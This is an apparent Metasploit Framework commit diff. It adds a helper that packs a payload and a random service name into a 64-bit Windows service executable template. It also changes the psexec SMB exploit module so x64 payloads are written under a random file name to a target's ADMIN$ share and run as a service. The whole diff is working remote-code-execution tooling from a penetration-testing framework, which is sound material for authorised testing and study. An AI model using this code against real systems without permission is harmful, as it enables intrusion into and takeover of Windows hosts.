allow x64 payloads to be used with psexec

git-svn-id: file:///home/svn/framework3/trunk@9565 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/util/exe.rb

@@ -351,6 +351,26 @@ require 'metasm'
 		return pe
 	end
 
+	def self.to_win64pe_service(framework, code, name='SERVICENAME')
+		pe = ''
+
+		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "service_x64.exe"), "rb")
+		pe = fd.read(fd.stat.size)
+		fd.close
+
+		bo = pe.index('PAYLOAD:')
+		raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
+		pe[bo, 8192] = [code].pack("a8192")
+
+		bo = pe.index('SERVICENAME')
+		raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
+		pe[bo, 11] = [name].pack('a11')
+
+		pe[136, 4] = [rand(0x100000000)].pack('V')
+
+		return pe
+	end
+
 	def self.to_win32pe_dll(framework, code)
 		pe = ''
 

modules/exploits/windows/smb/psexec.rb

@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         =>
 				[
-					'hdm'
+					'hdm',
 				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
@@ -127,7 +127,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		filename = rand_text_alpha(8) + ".exe"
 		simple.connect("ADMIN$")
 		fd = simple.open("\\#{filename}", 'rwct')
-		fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8))
+		if (datastore['PAYLOAD'].include? 'x64')
+			fd << Msf::Util::EXE.to_win64pe_service(framework,payload.encoded,rand_text_alpha(8))
+		else
+			fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8))
+		end
 		fd.close
 
 		print_status("Created \\#{filename}...")